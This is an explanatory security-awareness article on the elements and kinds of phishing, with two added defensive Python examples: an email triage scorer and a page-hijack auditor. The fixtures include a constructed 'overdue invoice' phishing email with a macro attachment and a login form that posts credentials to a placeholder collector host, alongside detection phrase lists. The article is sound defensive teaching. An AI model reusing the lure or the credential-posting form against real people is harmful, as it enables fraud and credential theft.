What is Phishing?
Phishing is a fraudulent scheme to misappropriate information or assets. This article will break down the critical elements of a phishing attack and then identify different phishing modalities. Ultimately, the best phishing defense is knowledge and awareness.
Phishing Elements
There are three critical elements to a phishing attack. Each of those elements has different manifestations which affect the overall look, feel, and type of phishing attack.
Phishing requires some sort of active fraudulent scheme. That scheme presents a situation designed to create urgency in the communication. It can manifest in a few different ways, like:
An imminently due or overdue bill or invoice
The threat of law enforcement action
Threat to professional licensure
Assistance for an executive
That urgency is necessary to prey on humans’ innate fight-or-flight response. When faced with stress, people will either question the phishing attempt (fight) or accede to the lure (flight). In the corporate environment, the workforce is typically helpful and accommodating toward clients, customers, and users. Phishers rely on that training to promote flight over fight responses. Since phishing is the most prevalent malicious entry point into the corporate environment, that’s been a successful model.
Without that fraudulent scheme, a threat actor is outright asking for information they shouldn’t have and obtaining that information. That may occur through happenstance (someone asks for information and is mistakenly given that information) or through force (e.g., blackmail). Security Awareness Training should address both, but they’re not traditionally considered to be phishing.
Misappropriation or Malware Delivery
Phishing has a purpose. Otherwise, it’s just spam. That purpose is always malicious and comes in a couple of flavors.
One purpose is to misappropriate information or assets. These are communications that directly attempt to obtain sensitive information, account credentials, or money. Those can look like this:
An “executive” texts a company’s workforce member to buy hundreds of dollars of gift cards and send them the codes
An “employee” who needs immediate help resetting their password with consequences if they’re not helped
A “patient” who needs access to their medical record
Another purpose is to deliver malware. Typically, this is done through macros or executables contained in attachments or embedded links. When opened, malicious code is downloaded onto the opener’s computer. That malicious code can impact the computer directly or establish persistence: semi-permanent access for a threat actor into a network. That persistence allows a threat actor to access resources on the network, exfiltrate them, and then deploy ransomware or otherwise cause harm to the environment.
Phishing requires communication. Most people, when they hear phishing, will think of email communications. While that’s an incredibly effective communication modality, it’s not the only one. Phishing can happen by text, phone, and even physical mail.
Some definitions of phishing will artificially limit phishing communication modalities to email. Those definitions seek to do so because they want to distinguish between more “traditional” phishing and social engineering. This article covers other communication modalities as phishing. There’s no wrong approach to defining these attacks. Frankly, your security awareness training needs to cover all those forms of attack in some way or another to safeguard your organization appropriately. How it covers it doesn’t really matter.
A fraudulent scheme to steal information and money or deploy malware without any communication would be what’s more traditionally thought of as a hack or an insider threat, depending on the source. If the source is outside the organization, that’s a hack. If it comes from inside the organization, then that’s an insider threat. Both must be safeguarded against with both infrastructure and security awareness training.
Types of Phishing
There are many different phishing attack manifestations. Individuals and groups running phishing attacks are very sophisticated and constantly coming up with new attack modalities to stay ahead of security awareness training and more effectively prey on individuals. Here are some of the overarching types.
Email phishing is arguably the most common phishing modality. Threat actors send emails, typically, but not necessarily, in bulk to unsuspecting victims. Bulk mailing is preferred here because phishing is a threat that benefits from volume. If, for the sake of argument, only 5% of people succumb to phishing attacks, then 5% of 500,000 is significantly larger than 5% of 5,000.
As highlighted under Phishing Elements, email phishing is an email that encourages urgency to open an attachment, click a link, or provide information. These emails can be independently created, or they can spoof the look and feel of otherwise legitimate emails.
Email phishing is sometimes designed to target a specific individual within an organization. This kind of phishing is called Spearphishing. Typically, spearphishing targets prominent individuals in an organization who control assets (financial or intellectual) and/or organizational leadership. Those emails leverage the individual’s position to exfiltrate important information, steal large sums of money, or gain sensitive information about those individuals.
Another form of email phishing that has risen in popularity over the past couple of years is Business Email Compromise or BEC. BEC is a practice whereby a threat actor gains access to the email systems of a company’s downstream vendor and then masquerades as the vendor to defraud the company of information or money. BEC is incredibly effective due to the apparent legitimacy of the attack and the ability to circumvent secure email gateways. However, it is a potentially difficult attack to implement because of the necessity of actual compromise of that downstream vendor.
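The three elements described under Phishing Elements (an urgency lure, a misappropriation or malware-delivery purpose, and an abused communication channel) are also the signals a mail-triage rule can score. The following is an added example, not code from the original article: a small Python scorer that parses a raw message and flags urgency phrases, direct requests for money or credentials, macro-enabled or executable attachments, and a Reply-To domain that differs from the From domain (the kind of quiet reply redirection seen in BEC and spoofed-vendor mail). The phrase list, extension list, weights, sample messages, and domain names are all constructed for the example.

```python
import re
from email import message_from_string
from email.policy import default as default_policy
from email.utils import parseaddr

# Phrases that manufacture urgency (constructed starter list; tune to your environment).
URGENCY_PHRASES = (
    "urgent", "immediately", "overdue", "legal action",
    "final notice", "within 24 hours", "suspended",
)

# Attachment types that can carry macros or execute directly (constructed list).
RISKY_EXTENSIONS = {
    ".docm", ".xlsm", ".pptm", ".exe", ".scr", ".js", ".vbs", ".hta", ".lnk", ".iso",
}

# Direct requests for money or credentials: the misappropriation purpose.
ASSET_REQUEST = re.compile(r"\b(wire|payment|gift cards?|password|credentials)\b")

# Weights are arbitrary starting values for the example, not a calibrated model.
WEIGHTS = {"urgency_lure": 1, "asset_request": 1, "reply_to_mismatch": 2, "risky_attachment": 3}


def _domain(address: str) -> str:
    """Lower-cased domain part of an RFC 5322 address, or '' when absent."""
    _, addr = parseaddr(address or "")
    return addr.rsplit("@", 1)[1].lower() if "@" in addr else ""


def triage(raw_message: str) -> dict:
    """Score one raw RFC 822 message against the three phishing elements."""
    msg = message_from_string(raw_message, policy=default_policy)
    findings = {}

    body_part = msg.get_body(preferencelist=("plain", "html"))
    body = body_part.get_content() if body_part is not None else ""
    text = f"{msg.get('Subject', '')}\n{body}".lower()

    # Element 1: the urgency lure in subject or body.
    hits = [phrase for phrase in URGENCY_PHRASES if phrase in text]
    if hits:
        findings["urgency_lure"] = hits

    # Element 2: purpose. Either a direct ask for assets ...
    asks = sorted(set(ASSET_REQUEST.findall(text)))
    if asks:
        findings["asset_request"] = asks

    # ... or malware delivery through a macro-enabled or executable attachment.
    risky = []
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        if "." in name and name[name.rfind("."):] in RISKY_EXTENSIONS:
            risky.append(name)
    if risky:
        findings["risky_attachment"] = risky

    # Element 3: channel abuse. A Reply-To on a different domain than From quietly
    # redirects the conversation to the sender's real mailbox, a common BEC tell.
    from_domain = _domain(msg.get("From", ""))
    reply_domain = _domain(msg.get("Reply-To", ""))
    if reply_domain and reply_domain != from_domain:
        findings["reply_to_mismatch"] = [from_domain, reply_domain]

    score = sum(WEIGHTS[name] for name in findings)
    return {"score": score, "verdict": "phish" if score >= 3 else "clean", "findings": findings}


# Constructed sample: an "overdue invoice" lure with a reply redirection and a
# macro-enabled attachment (not a real message; domains are placeholders).
SAMPLE_PHISH = """From: "Accounts Payable" <ap@vendor-example.com>
Reply-To: ap@vendor-example.co
To: finance@example.org
Subject: URGENT: overdue invoice - pay today
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

Your invoice is overdue and legal action will follow unless payment is made immediately.
Please open the attached invoice and wire payment today.
--b1
Content-Type: application/octet-stream; name="invoice.xlsm"
Content-Disposition: attachment; filename="invoice.xlsm"

AAAA
--b1--
"""

# Constructed benign sample for comparison.
SAMPLE_BENIGN = """From: alice@example.org
To: bob@example.org
Subject: Lunch on Thursday?

Want to grab lunch Thursday? No rush, let me know.
"""

if __name__ == "__main__":
    for label, raw in (("phish", SAMPLE_PHISH), ("benign", SAMPLE_BENIGN)):
        print(label, triage(raw))
```

Run as a script it scores both samples; in practice the rule would sit behind a mail gateway or in a SOAR playbook, and the thresholds would be tuned against real traffic. Note that a true BEC message sent from a genuinely compromised vendor mailbox passes the Reply-To check, which is exactly why the article calls BEC effective at circumventing secure email gateways.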
Voice phishing, or vishing, is the practice of using a lure to draw someone to a phone call. Typically, this is done with an automated phone call. That automated phone call threatens some sort of disaster or negative consequences for failing to call back.
Some forms of vishing may have non-phone lures. For example, a malicious website may display a popup informing you that your computer is infected with a virus and telling you to call a number.
In any event, by calling that number, you’re directed to a call center. That call center will make various claims, typically with the ultimate goal of fraudulently obtaining money, either in the form of cryptocurrency or gift cards.
Vishing shares many characteristics of more traditional social engineering. In those social engineering cases, someone may call a company to attempt to reset a password without providing the information typically needed to do so. Sometimes, this kind of attack is effective in giving threat actors access to a company’s infrastructure.
Due to those similarities, some security awareness training programs may consider vishing to be generic social engineering and not phishing. As identified above, how vishing is characterized isn’t nearly as important as how to address and avoid vishing threats.
Text phishing is a generic term for phishing done via SMS or MMS text messaging. The threat actor will request gift cards, ask the recipient to click a link, or direct the recipient to call a number. This form of phishing has effectively the same effect as vishing or email phishing, with a different delivery modality.
That delivery modality drives effectiveness: texting is a more informal and personal form of communication. The attack is made more plausible because “hey, I got your number from [insert mutual acquaintance here], can you do me a favor…” is a totally foreseeable situation.
Calendar phishing occurs when someone sends a calendar invite to a recipient. Depending on the recipient’s calendar settings or active management of their own calendar, they may go into a meeting designed to defraud them of information, money, or other assets.
Calendar phishing is similar to vishing with a different lure. The success of calendar phishing depends on the recipient’s attentiveness to and management of their calendar. Someone who isn’t as attentive as they should be has the potential to wander into a tricky situation. Since we collectively trust that meeting invites on our calendar should be on our calendar, this attack modality can be moderately successful.
Page hijacking is one of the more controversial forms of phishing in that it only very technically meets the definition posed above; many definitions exclude it. It is typically excluded because of its modality of communication. Instead of active outreach, which is typical for the other forms of phishing outlined here, page hijacking relies on passive outreach via compromising an otherwise legitimate website.
While the modality of communication is different, the end result is the same: the compromise sends the browsing individual to a different website requesting money or information or deploys malicious content on the user’s computer.
Page hijacking is also used to conduct man-in-the-middle attacks. Instead of relying on an active phishing lure, those attacks let the user submit credentials and information to the site as they normally would, while also capturing those credentials for later use.
That example highlights why page hijacking is so controversially considered phishing: it includes activities that are traditionally defined as a different attack modality. It also highlights why classification isn’t as important as training. Whether page hijacking is identified as phishing or not, the threat is very real and potentially damaging to an organization.
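Because page hijacking is passive, the defender's check is on the site itself rather than on inbound messages. The following is an added example, not code from the original article: a Python audit that parses a page's HTML and reports any login form that posts to a host the site does not own (credential capture), any script loaded from an untrusted host (injected content), and any meta-refresh redirect to another host (sending the visitor elsewhere). The page URL, trusted host list, and sample HTML are constructed for the example; in use, the audit would run against a freshly fetched copy of each sensitive page and alert on any finding.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _PageCollector(HTMLParser):
    """Collect form actions, script sources and meta-refresh targets from HTML."""

    def __init__(self):
        super().__init__()
        self.form_actions, self.script_srcs, self.refresh_targets = [], [], []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases attribute names; valueless attributes arrive as None.
        a = {name: (value or "") for name, value in attrs}
        if tag == "form" and a.get("action"):
            self.form_actions.append(a["action"])
        elif tag == "script" and a.get("src"):
            self.script_srcs.append(a["src"])
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            # content looks like "0; url=https://example.test/"
            for piece in a.get("content", "").split(";"):
                piece = piece.strip()
                if piece.lower().startswith("url="):
                    self.refresh_targets.append(piece[4:].strip())


def _host(url: str, base: str) -> str:
    """Hostname of url resolved against base (relative URLs resolve to the page's own host)."""
    return (urlsplit(urljoin(base, url)).hostname or "").lower()


def audit_page(html: str, page_url: str, trusted_hosts=()) -> list:
    """Return (kind, absolute_url) findings for anything on the page that would
    send the visitor's data or browser to a host the site does not own."""
    site_host = (urlsplit(page_url).hostname or "").lower()
    trusted = {site_host, *(h.lower() for h in trusted_hosts)}
    collector = _PageCollector()
    collector.feed(html)

    checks = (
        ("offsite_form_action", collector.form_actions),  # credential harvesting
        ("untrusted_script", collector.script_srcs),      # injected script
        ("offsite_redirect", collector.refresh_targets),  # redirect to another site
    )
    findings = []
    for kind, urls in checks:
        for url in urls:
            if _host(url, page_url) not in trusted:
                findings.append((kind, urljoin(page_url, url)))
    return findings


# Constructed sample of a sign-in page after a hypothetical injection: the login
# form now posts off-site and a foreign script was added (placeholder hostnames).
PAGE_URL = "https://www.example-bank.test/login"
TRUSTED_HOSTS = ("static.example-bank.test",)
SAMPLE_PAGE = """<!doctype html>
<html><head>
<title>Example Bank - Sign in</title>
<script src="/static/app.js"></script>
<script src="https://static.example-bank.test/ui.js"></script>
<script src="https://cdn.unknown-example.net/k.js"></script>
</head><body>
<form method="post" action="https://login-collector.example.net/submit">
  <input name="user"><input name="pass" type="password">
</form>
</body></html>
"""

if __name__ == "__main__":
    for kind, url in audit_page(SAMPLE_PAGE, PAGE_URL, TRUSTED_HOSTS):
        print(f"{kind}: {url}")
```

The check is deliberately allowlist-based: anything not on the site's own hosts is reported, so a newly injected host is caught without knowing its name in advance. It does not see content added by scripts at runtime, so it complements, rather than replaces, file-integrity monitoring on the web server.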
There are many different kinds of phishing, all of which have a different look and feel but share a common goal: to steal information and money and/or compromise an organization’s network assets. This is also a quickly developing space. It has to be for threat actors to stay ahead of administrative and technical safeguards designed to thwart phishing attacks. Consequently, what’s critical is preventing attacks by training on how attacks manifest and how to avert them.